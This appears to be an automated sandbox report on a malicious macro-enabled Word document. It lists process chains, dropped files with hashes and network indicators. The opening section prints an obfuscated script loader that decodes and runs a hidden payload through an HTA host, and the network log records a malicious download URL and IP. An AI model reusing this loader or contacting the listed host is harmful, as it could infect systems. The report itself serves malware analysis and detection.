nJ9brGuco2u5A2yinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUybnJ9brKMco2u5n2yinUyJnJ9brFOco2u5CJyinUxtnJ9brJMco2u5LJyinUyfnJ9brKAco2u5MJyinUx7nJ9brJSco2u5LJyinUyinJ9brIAco2u5ATyinUxjnJ9brF5co2u5L2yinUyfnJ9brJ9co2u5p2yinUyynJ9brFuco2u5XJyinUx7nJ9brK1co2u5LJyinUyLnJ9brJAco2u5Z2yinUy0nJ9brFOco2u5CJyinUxtnJ9brFWco2u5LJyinUyanJ9brJ9co2u5nTyinUyKnJ9brFWco2u5B2yinUy2nJ9brJSco2u5pzyinUxtnJ9brJSco2u5DzyinUybnJ9brJ5co2u5MzyinUxtnJ9brG1co2u5VTyinUxgnJ9brGAco2u5Z2yinUx3nJ9brGAco2u5ATyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUx3nJ9brKAco2u5HTyinUybnJ9brIcco2u5VTyinUx9nJ9brFOco2u5VzyinUyunJ9brKcco2u5FzyinUyanJ9brJkco2u5VzyinUx7nJ9brJSco2u5BTyinUyXnJ9brJWco2u5IJyinUyLnJ9brFOco2u5CJyinUxtnJ9brGEco2u5AzyinUxmnJ9brGqco2u5ZTyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUx3nJ9brIWco2u5L2yinUyinJ9brFOco2u5CJyinUxtnJ9brF1co2u5ZJyinUx5nJ9brGEco2u5ZJyinUx0nJ9brGgco2u5LJyinUyinJ9brJSco2u5ITyinUx1nJ9brFOco2u5CJyinUxtnJ9brF1co2u5AJyinUxlnJ9brGAco2u5A2yinUxmnJ9brGgco2u5qzyinUyunJ9brKWco2u5VTyinUyunJ9brIcco2u5ZTyinUyRnJ9brKOco2u5VTyinUx9nJ9brFOco2u5AJyinUx4nJ9brGuco2u5ZJyinUxlnJ9brGgco2u5LJyinUyLnJ9brGOco2u5pzyinUyHnJ9brF5co2u5pzyinUy1nJ9brJ5co2u5XTyinUxvnJ9brKWco2u5MJyinUyanJ9brKAco2u5qzyinUylnJ9brGAco2u5ZzyinUxtnJ9brFWco2u5VTyinUxenJ9brFOco2u5LJyinUyxnJ9brJIco2u5FzyinUyZnJ9brGAco2u5XJyinUx7nJ9brKMco2u5LJyinUylnJ9brFOco2u5LJyinUxjnJ9brHEco2u5rTyinUx3nJ9brJkco2u5VTyinUx9nJ9brFOco2u5VzyinUyunJ9brJyco2u5p2yinUyZnJ9brIMco2u5VzyinUx7nJ9brJSco2u5IJyinUy6nJ9brHEco2u5qTyinUyDnJ9brFOco2u5CJyinUxtnJ9brJSco2u5ZTyinUyRnJ9brKuco2u5A2yinUyfnJ9brF5co2u5oTyinUyynJ9brJ5co2u5M2yinUy0nJ9brJuco2u5B2yinUx="; ine n4kCB = snyfr; ine n3omIM = 34731; nfo9z2 = snyfr; ine ndhF7 = -5752; nEhV8M = snyfr; nx9E8.ErtJevgr(nC1qZ, np3Ge, "ERT_FM"); </fpevcg> <fpevcg ynathntr="iofpevcg"> n14h05 = nx9E8.ErtErnq(nC1qZ) nx9E8.ErtQryrgr(nC1qZ) </fpevcg> <fpevcg ynathntr="wninfpevcg"> nf1NW = snyfr; ine ns9u5V = 19490; n14h05 = qrpbqr(n14h05); ine nZKYgF = snyfr; ine nO6Q75 = -48094; n14h05 = n14h05.ercynpr(/vbul/vt, ""); n6GDru = gehr; nuiPlX = "n4gQo1"; nmG1n = nuiPlX.gbFgevat(); ine nuBiY = arj Shapgvba("h", "p", n14h05); nlnAEP = gehr; nlrmo = 40119; nuBiY("=ZGLfSJr1y2YF92M6IIJzyxIQuILey2KxOKLGWSEYqJEMy0Ij52GfyTETMHpY1zEG5znhOUJQSHFFu2piVKEhuTnAgRov9FM0STMjI3Yg92LhtwZ0Hwpyq3ofM2YibQp0EUn", 1); ine n56oOi = 25284; ine nNH4M6 = 30232; jvaqbj.pybfr(); </fpevcg> </obql> </ugzy>

XMP

Title: -
Subject: -
Creator: iuhos
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start start winword.exe in.com

Process information

PID
CMD
Path
Indicators
Parent process
1228"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\legal paper_11.20.doc.docm"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
1628C:\Users\admin\AppData\Local\Temp\in.com C:\Users\admin\AppData\Local\Temp\in.htmlC:\Users\admin\AppData\Local\Temp\in.com
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\users\admin\appdata\local\temp\in.com
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
Total events
1 967
Read events
923
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
0
Text files
5
Unknown types
2

Dropped files

PID
Process
Filename
Type
1228WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD2AC.tmp.cvr
MD5:
SHA256:
1228WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:EBD3E1D14D424890E0304389FA12B511
SHA256:2E271237063538C592A374F8800C5DCDA563BB41A5CDFD8C1C9662081569B869
1228WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$gal paper_11.20.doc.docmpgc
MD5:6999C648F79D0235C95434ECDDEBB937
SHA256:C5830E150C20724E748671A2ED17EB66F989DE0179AF88F6DC6AD39A751314EC
1228WINWORD.EXEC:\Users\admin\AppData\Local\Temp\in.htmlhtml
MD5:CA2FB07628989AB417EB4D392B8F5AC6
SHA256:995747DBD89F59B364311E73A0D1EE2BCC4657924575EDFE877434C2CDD2E937
1628in.comC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z2BCOUL\iuyala3[1]text
MD5:FDA44910DEB1A460BE4AC5D56D61D837
SHA256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
1628in.comC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\warning[1]image
MD5:124A9E7B6976F7570134B7034EE28D2B
SHA256:5F95EFF2BCAAEA82D0AE34A007DE3595C0D830AC4810EA4854E6526E261108E9
1628in.comC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\error[1]text
MD5:B9BEC45642FF7A2588DC6CB4131EA833
SHA256:B0ABE318200DCDE42E2125DF1F0239AE1EFA648C742DBF9A5B0D3397B903C21D
1228WINWORD.EXEC:\Users\admin\AppData\Local\Temp\in.comexecutable
MD5:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
SHA256:949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820
1628in.comC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\error[1]html
MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
SHA256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1628
in.com
GET
301
94.23.162.163:80
http://flower5428.com/update/blKMhhnEr/shRIACXpnjnSFmKqFFDilOnpWIYEgKDRSapd_ikaXCVIfYUzgoR/iuyala3
DE
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1628
in.com
94.23.162.163:80
flower5428.com
OVH SAS
DE
malicious

DNS requests

Domain
IP
Reputation
flower5428.com
  • 94.23.162.163
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info